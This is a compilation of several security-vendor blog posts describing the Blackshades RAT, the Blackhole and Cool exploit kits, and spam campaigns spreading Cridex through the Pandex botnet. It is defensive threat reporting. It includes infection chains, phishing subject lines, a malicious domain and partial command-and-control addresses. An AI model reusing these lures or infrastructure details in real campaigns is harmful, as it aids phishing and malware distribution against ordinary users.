Blackshades Rat Usage on the Rise Despite Author’s Alleged Arrest

Back in 2012, a key player involved with the prominent Remote Administration Tool (RAT) known as Blackshades RAT was reportedly arrested. Despite his alleged arrest, and with its code leaked in 2010, the tool is still being sold and used in cybercriminal activity. Symantec Security Response has noticed that the use of the RAT has increased over the last five months.
 
Blackshades RAT, detected by Symantec products as W32.Shadesrat, will gather passwords and credentials from infected systems, sending them back to the malicious command-and-control (C&C) server. This increase in activity prompted us to investigate the main C&C servers that manage the latest infections. Upon investigation, we found a connection to the Cool Exploit Kit, which has been used to distribute W32.Shadesrat, but also several other malware families.
 
Shadesrat and Cool Exploit 1.png
Figure 1. Shadesrat evolution since July 2013
 
For the last few years we have seen a spectacular increase of attacks against Web servers using recently discovered vulnerabilities to target industries, think tanks, government institutions and users. In all cases, the attacker’s goal is very clear; to execute a malicious payload on the user’s computer. The attackers managed to do this using different exploit kits. 
 
When Symantec observed the increase of W32.Shadesrat infections, we identified hundreds of C&C servers being used to gather credentials from compromised computers. W32.Shadesrat targets a wide variety of credentials including email services, Web services, instant messaging applications, and FTP clients. Spammers looking for new mail credentials, attackers trying to continue their security breaches with access to new servers and services, and attackers looking for specific information to exfiltrate might be interested in this kind of information.
 
During our research, we found that nearly all of the C&C servers have hosted exploit kits at some point, and until the arrest of the author of the Blackhole Exploit Kit and the Cool Exploit Kit, the latter has been the most prevalent. These kits try to exploit different vulnerabilities in the user’s computer to execute a malicious payload and infect them. Underground teams have a wide range of resources to perform their attacks.
 
Shadesrat and Cool Exploit 2.png
Figure 2. Exploit kits used by C&C servers from September and October until arrest
 
We also observed that after the arrest of the author of the Blackhole Exploit Kit and Cool Exploit Kit, both exploit kits have nearly disappeared, leaving Neutrino as the new kit of choice.
 
Shadesrat and Cool Exploit 3.png
Figure 3. Exploit kits used by C&C servers from October and November after arrest
 
Once an unsuspecting user has been compromised, multiple payloads are downloaded and used to retain control by using Remote Administration Tools or downloaders that enable them to install additional malware with new functionalities.
 
The C&C servers also spread the following other malware threats.
 
Shadesrat and Cool Exploit 4.png
Figure 4. Threats spread by C&C servers in September and October
 
We used our telemetry systems to locate where the C&C servers are located and where the W32.Shadesrat infections are more prominent.
 
Shadesrat and Cool Exploit 5.png
Figure 5. C&C server locations
 
Shadesrat and Cool Exploit 6.png
Figure 6. W32.Shadesrat infections
 
Lithuania and the United States host the highest amount of C&C servers. India is the most affected country, followed by the United States and the United Kingdom, but countries all around the world have been affected by W32.Shadesrat.
 
The distribution of the threats suggests that the attackers attempted to infect as many computers as possible. The attackers do not seem to have targeted specific people or companies.
 
This demonstrates how complete the threat landscape is, as well as the resources that attackers have at their disposal. Don’t forget to make sure that your software is up to date and that your antivirus solution has the latest definitions.

The Dangers of a Royal Baby: Scams Abound

Big news stories are always an opportunity for scammers and spammers, who attempt to redirect users to malicious exploit kits or other unwanted services. Britain’s royal baby is the latest news to offer cover for malware. We have already found a lot of spam messages regarding the birth and baby that lead users to the infamous Blackhole exploit kit.

The initial infection arrives as spam mail that contains a redirection URL in the following format:

Royal_Baby_gift

Figure 1: Spam email.

  • hxxp://[infectedDomain]/[Random]/index.html

From there the user will land on a page with links to JavaScript files as in the next image:

Spam URL

Figure 2: Spam URL.

The first level contains the three *.js URLs that point to other infected/malicious domains. Once victims land on this page, the JavaScript files will lead them to a page like the following:

Blackhole Landing page redirector

Figure 3: Blackhole landing page redirector.

The second-level URL shows us the actual landing page of the Blackhole exploit kit, which leads us to this content:

customized encoded Blackhole Landing page

Figure 4: Customized encoded Blackhole landing page.

We have decoded the customized base64-encoded Blackhole landing page, which resulted in a “plug-in detect” JavaScript code. This is a piece of code used by Blackhole to identify which plug-ins are installed on the machine, so it can target the payload for the specific plug-in versions available in the user’s browser. The next image shows us the decoded PluginDetect.js:

Decode Blackhole Landing Page (plugindetect.js with malicious URL)

Figure 5: Decoded Blackhole landing page (PluginDetect.js with malicious URL).

The following browser plug-ins are known to be targeted by the exploit kit:

  • Java Runtime Environment
  • Adobe PDF Reader
  • Flash

McAfee coverage for the PluginDetect.js zero-day threat is JS/Exploit!JNLP.d.

The following images show the PDF and Java downloading a malicious URL:

JAVA_11

Figure 6: JAR file downloading the URL in PluginDetect.js.

PDF file download URL in plugindetect.js

Figure 7: PDF file downloading the URL in PluginDetect.js.

This chain redirection could leave victims infected with one of these malware families:

For more detail about the Blackhole exploit kit, please refer the McAfee Threat Advisory Library.

Thanks to my colleague Rohan Shah for his assistance with this blog.

Blackhole Exploit Kit Spam Campaigns Disguised as Top Service Brands

Spam campaigns based on the Blackhole Exploit Kit send messages that contain links to compromised legitimate websites, which serve hidden iframes and redirections that exploit vulnerabilities across operating systems–from Android to Windows. Spam themes we have seen vary rapidly and are disguised to appear as legitimate messages from familiar services. Campaigns spoofing Facebook, LinkedIn, American Airlines, and various banking services carry embedded links to malware. Spammers abuse email templates from familiar service providers by capturing automated emails, replacing links in the template with links to malware, and rebroadcasting those messages to harvested or predicted recipients.

This tactic has proven effective for spammers. Recipients are likely to click links in familiar-looking emails and often create custom whitelist entries for common sending domains without enforcing Sender Policy Framework or DomainKeys Identified Mail validation.

The Messaging Security Team at McAfee Labs has closely monitored this trend and would like to share a few common traits from recent campaigns to aid in identification:

  • Messages are disguised to appear as legitimate mails from well-known service providers
  • Subject lines are very catchy and similar to those of any service provider

Subject line examples:

  • Your Verizon wireless bill
  • Pending Wire Transfer Notification – Ref: 15192
  • TrustKeeper Network Scan Information
  • BBC-Email: USA government decided to follow Cyprus and rise deposit taxes!!!
  • [FIRSTNAME LASTNAME] left you a comment…
  • Your order # ID[Random digits] has been completed

Other features:

  • URL paths commonly end in …/random_word.html or …/random_word.php
  • Spammers recycle templates across campaigns. These emails could have embedded links to malware or attached .zip/executable files.
  • Unsubscribe links are typically missing or replaced with malicious links

Blackhole Spam Samples

Fake wire-transfer campaign:

Paras_Blackhole_Wire_Transfer

Fake LinkedIn campaign:

Paras_Blackhole_LinkedIn_Sample

Fake Facebook campaign:

Paras_Blackhole_Facebook_Sample

 

You will notice all of these samples have fake .html or .php links, which are highlighted in red in the foregoing samples. These are the links carrying payloads that we need to be aware off.

The bad guys will use many techniques to deliver their spam; social engineering is a reality. Messaging Security advises caution when clicking links in emails: hover first! Employ multiple layers of defense in your environment–from email defense to web security to antimalware, and keep those definitions up to date!

Trojan.Pandex – A New Spam Affair

Contributor: Lionel Payet

Last week we saw how W32.Waledac was getting cozy with W32.Virut, but let us not forget about other spam botnets, like Trojan.Pandex (a.k.a. Cutwail), as they also persist in their propagation affairs.

The people behind W32.Cridex have used many attack vectors to spread the malware, including taking advantage of exploit kits like Blackhole, or attempting to deceive users with crafted PDF documents. This month they have managed to compose a more elaborate attack.

The attackers have managed to host a malicious HTML file at a legitimate web site, which has been compromised. This file would then redirect the user to a Blackhole exploit kit, which would deliver W32.Cridex to the compromised computer. But how did they attempt to deceive the user? By renting a botnet.

The Pandex botnet, also known as Cutwail and Pushdo, is not a new threat: it has been in the wild for more than six years and is responsible for roughly 18 percent of the spam emails detected by Symantec per day, worldwide. It not only sends spam, it is able to collect email addresses from compromised computers which can then be used in future campaigns. Symantec has several detections for the threat:

Using our telemetry systems, we can estimate the following distribution of the threat:
 

Figure 1. Heatmap illustrating the distribution of the Trojan.Pandex spam
 

W32.Cridex attack vector

The following image illustrates how W32.Cridex may arrive on a compromised computer.
 

Figure 2. W32.Cridex attack steps
 

Computers that were infected with Trojan.Pandex sent emails like the following:
 

Figure 3. Sample Trojan.Pandex email
 

If the user follows the link, a malicious HTML file hosted at judiciary.go.ke is then accessed, which would redirect the user to the following malicious URL:

  • dfudont.ru:8080/[REMOVED]/column.php

The domain resolves to the following locations:

  • 212.112.[REMOVED] (Germany)
  • 89.111.[REMOVED] (Russian Federation)
  • 91.224.[REMOVED] (Lithuania)

Symantec has a number of IPS detections for the BlackHole v2 exploit kit, and our telemetry data indicates that we have detected the following signatures from the malicious URL:

  • Web Attack: Blackhole Exploit Kit Website 8
  • Web Attack: Blackhole Exploit Kit
  • Web Attack: Blackhole Functions
  • Web Attack: Blackhole Toolkit Website 20
  • Web Attack: Blackhole Toolkit Website 31

The following heatmap illustrates the distribution for the above detections:
 

Figure 4. Heatmap distribution for IPS detections associated with Blackhole exploit kit
 

If the Blackhole exploit is successful, W32.Cridex is then downloaded onto the compromised computer. Symantec has the following detections in place:

The worm then communicates with its command-and-control (C&C) servers, enabling the C&C servers to download, upload, and execute files on the compromised computer, potentially exposing the user to even more malware.

At the time of analysis, the C&C servers being used included:

  • 140.123.[REMOVED]:8080      
  • 182.237.[REMOVED]:8080     
  • 220.86.[REMOVED]:8080       
  • 221.143.[REMOVED]:8080       
  • 64.85.[REMOVED]:8080       
  • 163.23.[REMOVED]:8080      
  • 210.56.[REMOVED]:8080      
  • 173.245.[REMOVED]:8080      
  • 173.201.[REMOVED]:8080     
  • 203.217.[REMOVED]:8080     
  • 97.74.[REMOVED]:8080      
  • 62.28.[REMOVED]:8080      
  • 69.64.[REMOVED]:8080        
  • 38.99.[REMOVED]:8080       
  • 174.142.[REMOVED]:8080     
  • 78.28.[REMOVED]:8080       
  • 88.119.[REMOVED]:8080      
  • 188.117.[REMOVED]:8080     
  • 217.65.[REMOVED]:8080
  • 188.165.[REMOVED]:8080   

After our analysis, we can confirm the findings of our colleagues from Dynamoo and that the compromised server has been notified and the malicious file removed.

We advise users to ensure operating systems and software are up to date and to avoid clicking on suspicious links while browsing the Internet or checking email.